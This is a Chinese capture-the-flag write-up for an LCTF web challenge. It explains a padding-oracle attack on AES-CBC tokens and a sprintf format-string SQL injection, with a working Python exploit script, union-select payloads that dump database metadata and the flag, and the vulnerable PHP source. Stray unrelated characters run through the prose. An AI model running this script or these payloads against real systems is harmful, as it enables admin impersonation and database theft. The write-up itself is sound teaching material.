LCTF的一道padding oracle攻擊+sprintf格式化字符串導(dǎo)致的SQL注入

http://111.231.111.54/
泄露了兩個源碼
.login.php.swp .admin.php.swp 源碼丟在最下面凸舵,可用vim -r恢復(fù)

第一次接觸padding oracle淑廊,這題能做出來吐咳,真的是要感謝我的朋友Pr0ph3t給我的指點(diǎn)

結(jié)合這道題井赌,講解一下padding oracle的攻擊方式

題目大概是這樣的邏輯:

函數(shù)一:get_identity()

image.png

只有當(dāng)你以一個賬號密碼成功登陸后个从,才會進(jìn)入get_identity()颁督,此時會生成一個隨機(jī)的token爸舒,然后采用aes-128-cbc的加密方式,用這個隨機(jī)生成的token和密鑰祥国,循環(huán)加密生成一個$id昵观,如果生成的$id=admin,那你就有session['isadmin']舌稀,所以用隨機(jī)token啊犬,加密得到admin這個id的概率是非常小的,所以基本上所有用賬號密碼的用戶登陸都是guest

那管理員怎么登陸呢壁查?對了觉至,他不用賬號密碼,用一個特定的token來登陸睡腿,就是下面的函數(shù) test_identity()

image.png

管理員直接傳個特定的token语御,然后就會被后端的密鑰解密,一解密得到的 id 就是admin席怪,就認(rèn)證成功了应闯。

這個特定的token其實(shí)很容易得到,直接用密鑰和admin這個id挂捻,解密即可生成

但是如果我們不知道密鑰碉纺,那就需要用padding oracle攻擊,來得到這個管理員特定的token刻撒,詳細(xì)的原理可參考以下鏈接
http://f1sh.site/2017/08/04/%E5%88%9D%E5%AD%A6padding-oracle-attack/
http://www.reibang.com/p/ad8bdd87e131

這里只講解攻擊方式和大致原理:

  • 不斷用admin和admin去登陸骨田,得到很多token,記住這里的admin声怔,admin不是管理員态贤,可以把它認(rèn)為是一個很普通的賬號,真正的管理員是用token登陸的醋火,這個邏輯當(dāng)時納悶了我好久悠汽。。芥驳。介粘。

  • 用登陸得到的很多token,模仿管理員直接用這些token去訪問admin.php晚树,那么就會進(jìn)入test_identity()函數(shù)姻采,進(jìn)行解密操作,這時候的解密,其實(shí)就是將middle和IV(token) 逐位異或慨亲,如果能符合padding規(guī)則婚瓜,就會生成一個明文,然后拿這個明文hex解碼看看是不是admin這個id刑棵,是的話就認(rèn)證成功巴刻,不是的話就認(rèn)證失敗


    image.png
  • 所以,如果padding失敗蛉签,服務(wù)器就會返回500錯誤和error!胡陪,原因是這個解密函數(shù)解密出錯,我們不斷獲取token去進(jìn)行padding oracle攻擊碍舍,直到后端可以正常解密出一個明文柠座,并且不會報錯,即使它不是admin片橡,這時候我們就能得到middle的值

  • 我們拿middle妈经,去和admin這個id異或,就生成了admin的tokenE跏椤4蹬荨!

  • 或者我們可以隨便拿一個admin,admin登陸獲得的舊token经瓷,然后和middle異或爆哑,得到它的明文(id),然后 舊token ^ 舊id ^ admin(新id) = 新IV (admin的token) 數(shù)學(xué)推導(dǎo)如下

    image.png

    其實(shí)這也就是CBC翻轉(zhuǎn)的原理舆吮,有時候你知道你的token和解密后對應(yīng)的明文id泪漂,你就能把這兩個與admin這個id 三者異或,就能得到admin的token歪泳,可參考該文章
    http://www.reibang.com/p/7f171477a603

  • Padding Oracle Attack的關(guān)鍵在于:

  1. 攻擊者能夠獲知并修改IV
  2. 攻擊者能夠獲知解密的結(jié)果是否符合padding,如服務(wù)器是否報錯
  • 至此廢話完了露筒,一口氣敲完的呐伞,若寫錯了請指正,Orz

獻(xiàn)上腳本慎式,修改自 http://blog.csdn.net/qq_19876131/article/details/61918399

#coding:utf8
import requests
import base64

url='http://111.231.111.54/login.php'
N=16
old_token = 'eHNkaHkxSkxQbEplanFKbQ=='

def inject_token(token):
    header={"Cookie":"PHPSESSID=qv6iuvrs0bh3g3c0688ss2cb86;token="+token}
    print header
    result=requests.get(url,headers=header)
    return result
def xor(a, b):
    return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])

def pad(string,N):
    l=len(string)
    if l!=N:
        return string+chr(N-l)*(N-l)

def padding_oracle(N):
    get=""
    for i in xrange(1,N+1):
        for j in xrange(0,256):
            padding=xor(get,chr(i)*(i-1))
            c=chr(0)*(16-i)+chr(j)+padding
            result=inject_token(base64.b64encode(c))
            print result.content
            if "Error!" not in result.content:
                get=chr(j^i)+get
                break

    return get

while 1:
    middle1=padding_oracle(N)
    print "\n"
    if(len(middle1)+1==16):
        for i in xrange(0,256):
            middle=chr(i)+middle1
            print "token:"+old_token
            print "middle:"+middle
            plaintext=xor(middle,old_token);
            print "plaintext:"+plaintext
            des=pad('admin',N)
            tmp=""
            print des.encode("base64")
            for i in xrange(16):
                tmp+=chr(ord(old_token[i])^ord(plaintext[i])^ord(des[i]))
            print tmp.encode('base64')
            result=inject_token(base64.b64encode(tmp))
            if "admin" in result.content:
                print result.content
                print "success"
                exit()
成功以管理員身份伶氢,登陸admin.php,并可以傳入?yún)?shù)id和title
image.png

乍看這兩個參數(shù)都是做了預(yù)處理瘪吏,再帶入sql語句查詢
但是看到sprintf()癣防,是一個格式化字符串函數(shù),傳入的字符可覆蓋自身參數(shù)

可參考文章
https://paper.seebug.org/386/
http://www.cnblogs.com/test404/p/7821884.html
https://www.seceye.cn/1291.html

image.png

當(dāng)我們傳入 id=3&title=%1$ 'or(1)#

這時候掌眠,因為后端將 '轉(zhuǎn)譯成 \' 形成id=3&title=%1$ \'or(1)#
由于sprintf()的作用蕾盯,會吞掉$后面的兩個字節(jié),也就是 空格和\蓝丙,導(dǎo)致單引號逃逸成功级遭,不會被轉(zhuǎn)譯

image.png

所以這里就能成功注入了望拖,而且可以union注入,記得對payload進(jìn)行url編碼挫鸽,畢竟太多亂七八糟的符號

給出相關(guān)payload(未url編碼)和截圖

id=3&title=%1$ 'union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version(),@@hostname,@@datadir)#

id=3&title=%1$ 'union select 1,2,group_concat(distinct(table_name)) from information_schema.tables where table_schema=0x77656231#

id=3&title=%1$ 'union select 1,2,group_concat(distinct(column_name))  from information_schema.columns where table_name=0x6b6579 and table_schema=0x77656231#

id=3&title=%1$ 'union select 1,2,group_concat(distinct(f14g)) from web1.key#
image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

后端源碼
login.php

<?php
error_reporting(0);
session_start();
define("METHOD", "aes-128-cbc");
include('config.php');
function show_page(){
    echo '省略';
}
function get_random_token(){
    $random_token = '';
    $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
    for($i = 0; $i < 16; $i++){
        $random_token .= substr($str, rand(1, 61), 1);
    }
    return $random_token;
}
function get_identity(){
    global $id;
    $token = get_random_token();
    $c = openssl_encrypt($id, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
    $_SESSION['id'] = base64_encode($c);
    setcookie("token", base64_encode($token));
    if($id === 'admin'){
        $_SESSION['isadmin'] = 1;
    }else{
        $_SESSION['isadmin'] = 0;
    }
}
function test_identity(){
    if (isset($_SESSION['id'])) {
        $c = base64_decode($_SESSION['id']);
        $token = base64_decode($_COOKIE["token"]);
        if($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token)){
            if ($u === 'admin') {
                $_SESSION['isadmin'] = 1;
                return 1;
            }
        }else{
            die("Error!");
        }
    }
    return 0;
}
if(isset($_POST['username'])&&isset($_POST['password'])){
    $username = mysql_real_escape_string($_POST['username']);
    $password = $_POST['password'];
    $result = mysql_query("select password from users where username='" . $username . "'", $con);
    $row = mysql_fetch_array($result);
    if($row['password'] === md5($password)){
        get_identity();
        header('location: ./admin.php');
    }else{
        die('Login failed.');
    }
}else{
    if(test_identity()){
        header('location: ./admin.php');
    }else{
        show_page();
    }
}
?>

admin.php

<?php
error_reporting(0);
session_start();
include('config.php');
if(!$_SESSION['isadmin']){
    die('You are not admin');
}
if(isset($_GET['id'])){
    $id = mysql_real_escape_string($_GET['id']);
    if(isset($_GET['title'])){
        $title = mysql_real_escape_string($_GET['title']);
        $title = sprintf("AND title='%s'", $title);
    }else{
        $title = '';
    }
    $sql = sprintf("SELECT * FROM article WHERE id='%s' $title", $id);
    $result = mysql_query($sql,$con);
    $row = mysql_fetch_array($result);
    if(isset($row['title'])&&isset($row['content'])){
        echo "<h1>".$row['title']."</h1><br>".$row['content'];
        die();
    }else{
        die("This article does not exist.");
    }
}
?>

走過路過说敏,歡迎糾錯

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市丢郊,隨后出現(xiàn)的幾起案子盔沫,更是在濱河造成了極大的恐慌,老刑警劉巖枫匾,帶你破解...
    沈念sama閱讀 207,113評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件架诞,死亡現(xiàn)場離奇詭異,居然都是意外死亡婿牍,警方通過查閱死者的電腦和手機(jī)侈贷,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,644評論 2 381
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來等脂,“玉大人俏蛮,你說我怎么就攤上這事∩弦#” “怎么了搏屑?”我有些...
    開封第一講書人閱讀 153,340評論 0 344
  • 文/不壞的土叔 我叫張陵,是天一觀的道長粉楚。 經(jīng)常有香客問我辣恋,道長,這世上最難降的妖魔是什么模软? 我笑而不...
    開封第一講書人閱讀 55,449評論 1 279
  • 正文 為了忘掉前任伟骨,我火速辦了婚禮,結(jié)果婚禮上燃异,老公的妹妹穿的比我還像新娘携狭。我一直安慰自己,他們只是感情好回俐,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,445評論 5 374
  • 文/花漫 我一把揭開白布逛腿。 她就那樣靜靜地躺著,像睡著了一般仅颇。 火紅的嫁衣襯著肌膚如雪单默。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,166評論 1 284
  • 那天忘瓦,我揣著相機(jī)與錄音搁廓,去河邊找鬼。 笑死,一個胖子當(dāng)著我的面吹牛枚抵,可吹牛的內(nèi)容都是我干的线欲。 我是一名探鬼主播,決...
    沈念sama閱讀 38,442評論 3 401
  • 文/蒼蘭香墨 我猛地睜開眼汽摹,長吁一口氣:“原來是場噩夢啊……” “哼李丰!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起逼泣,我...
    開封第一講書人閱讀 37,105評論 0 261
  • 序言:老撾萬榮一對情侶失蹤趴泌,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后拉庶,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體嗜憔,經(jīng)...
    沈念sama閱讀 43,601評論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,066評論 2 325
  • 正文 我和宋清朗相戀三年氏仗,在試婚紗的時候發(fā)現(xiàn)自己被綠了吉捶。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,161評論 1 334
  • 序言:一個原本活蹦亂跳的男人離奇死亡皆尔,死狀恐怖呐舔,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情慷蠕,我是刑警寧澤珊拼,帶...
    沈念sama閱讀 33,792評論 4 323
  • 正文 年R本政府宣布,位于F島的核電站流炕,受9級特大地震影響澎现,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜每辟,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,351評論 3 307
  • 文/蒙蒙 一剑辫、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧渠欺,春花似錦妹蔽、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,352評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽盅视。三九已至捐名,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間闹击,已是汗流浹背镶蹋。 一陣腳步聲響...
    開封第一講書人閱讀 31,584評論 1 261
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人贺归。 一個月前我還...
    沈念sama閱讀 45,618評論 2 355
  • 正文 我出身青樓淆两,卻偏偏與公主長得像,于是被迫代替她去往敵國和親拂酣。 傳聞我的和親對象是個殘疾皇子秋冰,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,916評論 2 344

推薦閱讀更多精彩內(nèi)容

  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn)婶熬,斷路器剑勾,智...
    卡卡羅2017閱讀 134,601評論 18 139
  • 背景: 閱讀新聞 12C CDB模式下RMAN備份與恢復(fù) [日期:2016-11-29] 來源:Linux社區(qū) 作...
    陽屯okyepd閱讀 3,336評論 0 7
  • 文章分類 后臺文章分類列表頁模板導(dǎo)的詳細(xì)步驟建立數(shù)據(jù)表blog_category,并添加相應(yīng)的文章字段使用php ...
    JoyceZhao閱讀 1,692評論 0 12
  • 分組密碼每次只能處理加密固定長度的分組赵颅,但是我們加密的明文可能會超過分組密碼處理的長度虽另。這時便需要對所有分組進(jìn)行迭...
    查無此人asdasd閱讀 1,173評論 0 0
  • 聽前思考 在信息化的時代,應(yīng)該如何閱讀饺谬?哪些書適合快速粗讀捂刺,哪些書適合全盤精讀?做讀書筆記有哪些方法募寨? 一族展、什么是...
    Summerfy閱讀 504評論 0 0